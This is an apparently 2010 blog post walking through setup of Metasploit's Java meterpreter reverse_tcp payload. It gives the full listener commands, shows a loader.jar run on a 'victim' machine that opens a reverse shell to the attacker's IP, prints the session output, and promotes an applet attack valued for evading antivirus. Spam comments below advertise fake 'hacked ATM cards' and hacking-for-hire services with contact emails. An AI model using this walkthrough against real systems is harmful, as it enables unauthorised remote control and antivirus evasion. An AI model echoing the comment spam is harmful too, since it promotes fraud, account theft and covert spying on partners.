If you haven’t noticed the Metasploit Framework has a JAVA meterpreter payload for some time now
It supports all the commands supported by the PHP meterpreter, as of
SVN revision 9777, and additionally the ipconfig, route, and screenshot
commands.
It is not fully implemented into the framework yet and in order to get it up and running some manual tweaking is needed.
In this post I will show how to set it up and use it.
Further more, I have recreated my “Evil java applet wizard” to automate the the process of getting it up and running.
The script now supports a full java attack which includes the client side applet attack and uses the meterpreter java payload instead a binary executable.
Registered members can download the script at the end of this post (Script updated Aug 17) .
Why using a java meterpreter you ask ?
Well…you’ll see later…
Requirements:
JRE 1.2 on the victim machine is enough although some features, like
routing tables or screenshots, require JRE 1.3, JRE 1.4 or JRE 1.6.
You can find the java meterpreter payload jar file in:
"/pentest/exploits/framework3/data/java/loader.jar"
You will also need the “JavaMeterpreter.zip” file which you can download from HERE
I have just noticed that manual
tweaking is no longer necessary the Metasploit framework now has the
java meterpreter listener built in.
That means you can skip steps 1 to 4
and instead of using the patched php meterpreter you can use the java meterpreter directly.
I have also updated the script to use the java payload as well.
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 578 exploits - 297 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r10024 updated today (2010.08.17)
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(handler) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) >
Lets see how to set it up manually...
1. Download
root@Blackbox:~# cd /tmp/
root@Blackbox:/tmp# wget https://www.metasploit.com/redmine/attachments/397/JavaMeterpreter.zip --no-check-certificate
2. Unzip
root@Blackbox:/tmp# unzip JavaMeterpreter.zip
3. Copy necessary files
root@Blackbox:/tmp# cd extensions/
root@Blackbox:/tmp/extensions# cp {ext_server_stdapi.jar,meterpreter.jar} /pentest/exploits/framework3/data/meterpreter
4. Backup PHP Meterpreter files and Change jar files extensions to php (This will break PHP Meterpreter support)
root@Blackbox:/tmp/extensions# cd /pentest/exploits/framework3/data/meterpreter
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv meterpreter.php meterpreter.phpx
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv ext_server_stdapi.php ext_server_stdapi.phpx
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv meterpreter.jar meterpreter.php
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv ext_server_stdapi.jar ext_server_stdapi.php
5. Launch msfconsole and setup a multi/handler listener with a "php/meterpreter/reverse_tcp" payload.
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# cd ..
root@Blackbox:/pentest/exploits/framework3/data# cd ..
root@Blackbox:/pentest/exploits/framework3# ./msfconsole
__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 577 exploits - 295 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r9993 updated today (2010.08.13)
msf > use exploit/multi/handler
smsf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
6. Copy (transfer) “/pentest/exploits/framework3/data/java/loader.jar” to victim pc and run it as follows
C:\Documents and Settings\NightRanger>java -jar loader.jar
Usage: java -jar loader.jar []
C:\Documents and Settings\NightRanger>java -jar loader.jar 192.168.1.104 4444
7. Get your Meterpreter JAVA Shell…
[*] Sending stage (21717 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.104:4444 -> 192.168.1.106:1435) at Sat Aug 14 20:34:57 +0300 2010
meterpreter > sysinfo
Computer: exploit
OS : Windows XP 5.1 (x86)
meterpreter > getuid
Server username: NightRanger
meterpreter >
P.S:
The java meterpreter will work for linux systems as well….
root@Blackbox:/pentest/exploits/framework3/data/java# java -jar loader.jar 192.168.1.104 4444
meterpreter > exit
[*] Meterpreter session 1 closed. Reason: User exit
msf exploit(handler) > rexploit
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
[*] Sending stage (21717 bytes) to 192.168.1.104
[*] Meterpreter session 2 opened (192.168.1.104:4444 -> 192.168.1.104:59806) at Sat Aug 14 20:47:40 +0300 2010
meterpreter > sysinfo
Computer: Blackbox
OS : Linux 2.6.34 (i386)
meterpreter > getuid
Server username: root
meterpreter >
I have modified my “Evil Java Applet Wizard” script to use the JAVA Meterpreter Payload instead of a binary executable.
The reasons for that are:
1. Antivirus software will not detect JAVA Meterpreter as a malicious file (as you can see in the demo video below).
2. It make sense to use the Java Meterpreter payload if you are already using athe JAVA Applet client side attack vector.
If it worked it means that the victim has Java installed on his system which allowes us to use this payload.
Posted in: 
5 comments:
PLEASE READ!!!!
Celebrate this Christmas season with joy and gladness in your heart, Do you know that you can hack any ATM machine !!!
Am so happy I got mine from Debbie. she has specially programmed Blank ATM cards that can be used to hack and withdrawal money from any ATM machine, this ATM cards can be used to withdraw at anytime she sell this cards to all here customers and interested buyers The card works in all countries except Philippines, Mali and Nigeria., the cards has a daily withdrawal limit of $5000 i met Debbie because i met two people before her and they took my money not knowing that they were scams. But am happy now.Debbie sent the card through DHL and i got it in two days it is illegal but it helps a lot and no one ever gets caught i am grateful for this great miracle to Debbie because she changed my story all of a sudden . Debbie’s email address is (alexanderwilliam2019@gmail.com )
Here is her price list for ATM cards:
BALANCE PRICE
$10,000 ------------- $650
$20,000 ------------- $1,200
$35,000 --------------$1,900
$50,000 ------------- $2,700
$100,000------------- $5,200
The price include shipping fees,order now: via email ( alexanderwilliam2019@gmail.com )
elizabethmarry228@gmaIl.com is a home of solution. we are genius when it comes to hacking. We deliver to clients job at affordable rate and great speed. We waste no time and our success rate is 100% guaranteed.
Our services include
Credit repair
Change University grades
Facebook, twitter, IG hack
Email hack
Yahoo hack
Gmail hack
Outlook Hack
AOL Hack
Wipe criminal records
Wipe credit card debt
MasterCards/visa cards
Bank account
WU transfer
Money Gram
Credit Transfer
Data base hack and lot more.
Among other customized services...all this are at all great rate. Results guaranteed. Contact us at elizabethmarry228@gmail.com
elizabethmarry228@gmaIl.com is a home of solution. we are genius when it comes to hacking. We deliver to clients job at affordable rate and great speed. We waste no time and our success rate is 100% guaranteed.
Our services include
Credit repair
Change University grades
Facebook, twitter, IG hack
Email hack
Yahoo hack
Gmail hack
Outlook Hack
AOL Hack
Wipe criminal records
Wipe credit card debt
MasterCards/visa cards
Bank account
WU transfer
Money Gram
Credit Transfer
Data base hack and lot more.
Among other customized services...all this are at all great rate. Results guaranteed. Contact us at elizabethmarry228@gmail.com
WHENEVER YOU NEED A HACKER .Every date is expected to end in sex but with this girl it was different I fell in love at first sight most people think love at first sight was a lie I too was one of those but I was immediately proven to be wrong and fate was good to me, we fell in love and we dated for 5yrs, she would come home late and I would neglect it even though we had just moved in together, I would call but she wouldn't pick up, I became suspicious of her activities I was afraid she was in a form of trouble then I sought a close friend for an advice, when I told my friend my suspicions he told me he had a friend who was in a similar situation and he would call him now to introduce us, his friend's phone rang twice then he picked up after introducing us his friend told me to contact his cousin who works as an intern for an agency that the federal bank consults with when they are attacked by hackers and he added that he also does a freelance hack to earn on the side he also gave his contact to me and he hung up after saying our thank you's. His cousin name was Rosa and she helped me with the hack and just as I feared my girl was cheating on me, she has been cheating all along and I was the fool that would always be there I was heartbroken knowing I was about to propose to her all thanks to Rosa I would still be lied too, if you are interested in her freelance service her contact info is: (Parachutelift at gmail dot com), she can also hack into any social media account, Spy on any call, text, track locations, gain password to any social media account including your Emails.
WHENEVER YOU NEED A HACKER .Every date is expected to end in sex but with this girl it was different I fell in love at first sight most people think love at first sight was a lie I too was one of those but I was immediately proven to be wrong and fate was good to me, we fell in love and we dated for 5yrs, she would come home late and I would neglect it even though we had just moved in together, I would call but she wouldn't pick up, I became suspicious of her activities I was afraid she was in a form of trouble then I sought a close friend for an advice, when I told my friend my suspicions he told me he had a friend who was in a similar situation and he would call him now to introduce us, his friend's phone rang twice then he picked up after introducing us his friend told me to contact his cousin who works as an intern for an agency that the federal bank consults with when they are attacked by hackers and he added that he also does a freelance hack to earn on the side he also gave his contact to me and he hung up after saying our thank you's. His cousin name was Rosa and she helped me with the hack and just as I feared my girl was cheating on me, she has been cheating all along and I was the fool that would always be there I was heartbroken knowing I was about to propose to her all thanks to Rosa I would still be lied too, if you are interested in her freelance service her contact info is: (Parachutelift at gmail dot com), she can also hack into any social media account, Spy on any call, text, track locations, gain password to any social media account including your Emails.
Post a Comment